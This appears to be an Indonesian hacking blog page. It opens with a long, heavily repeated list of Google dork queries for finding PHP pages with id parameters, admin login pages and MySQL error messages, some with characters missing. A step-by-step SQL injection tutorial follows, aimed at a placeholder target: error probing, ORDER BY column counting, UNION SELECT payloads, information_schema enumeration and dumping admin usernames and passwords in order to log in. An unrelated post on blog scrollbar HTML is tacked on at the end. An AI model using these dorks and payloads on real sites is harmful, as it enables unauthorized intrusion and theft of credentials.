inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

1. mencari target.

Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.

Contoh :

http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

3. Maka akan muncul pesan error…

“You have an error in your SQL syntax.You have an error in your SQL syntax; check the

manual that corresponds to your MySQL server version for the right syntax to use near ”’

at line 1″ Dan masih banyak lagi macamnya.

4. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…

Disini kita akan menggunakan perintah order by

Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*

Apa yang dimaksud “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. kita tinggal pilih.

Kalo “+” sebagai penghubung perintah…

5. Sampai sini langsung saja cobain satu persatu…

http://www.target.com/berita.php?id=100+order+by+1/* (No Error)

http://www.target.com/berita.php?id=100+order+by+2/* (No Error)

http://www.target.com/berita.php?id=100+order+by+3/* (No Error)

http://www.target.com/berita.php?id=100+order+by+4/* (Jangan Menyerah)

Sampai muncul error…

Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9″

http://www.target.com/berita.php?id=100+order+by+9/*

6. Untuk mengetahui berapa angka yang show sekarang kita pakai UNION

Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Lalu perhatikan angka berapa yang keluar

7. Misalnya angka yang keluar adalah “3″ maka yang bisa kita lakukan adalah mengecek versi berapa mysql yang dipakai dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

8. kalau versi 5 langsung pakai perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Kalau untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.

Misalnya yang anda lihat adalah table “admin”

Sekarang kita bisa lihat duhulu kolomnya dengan mengganti kata “table”-nya…

Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”

Langsung saja kita lihat isinya…

Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Sekarang kalian bisa melihat username dan passwordnya…lalu login…

Gunakan dengan bijak

Selamat Mencoba Sobat Cyber Warriors👊

Read More

Cara Membuat Scrollbar di Postingan Blog

Scroll bar atau scrollbox merupakan kotak yang berisi tulisan, link, gambar dan kode script / html yang berfungsi untuk menghemat pemakaian halaman blog serta mempercepat proses loading blog. Membuat scroll box atau scroll bar pada postingan blog tidak lah terlalu susah karena penulisannya hampir sama dengan menulis postingan-postingan di blog pada umumnya.

Gambar scroll box atau scroll bar

Cara Membuat Scroll Box atau Scroll Bar Di Postingan Blog

1. Login ke blogger
2. Masuk ke halaman dashboard
3. Klik buat entri baru
4. Pilih HTML
5. Lalu masukan kode script berikut

<div style="overflow:auto;width:100px;height:100px;padding:10px;border:1px solid #eee">

Isi Scroll Box atau Scroll Bar

</div>

Keterangan : 
width:400px = lebar scroll box atau scroll bar
height:200px = tinggi scroll box atau scroll bar

      6. Klik Pratinjau atau preview, jika tidak ada pesan error maka publikasikan postingan anda

Selamat Mencoba Sobat Cyber Warriors👊

Read More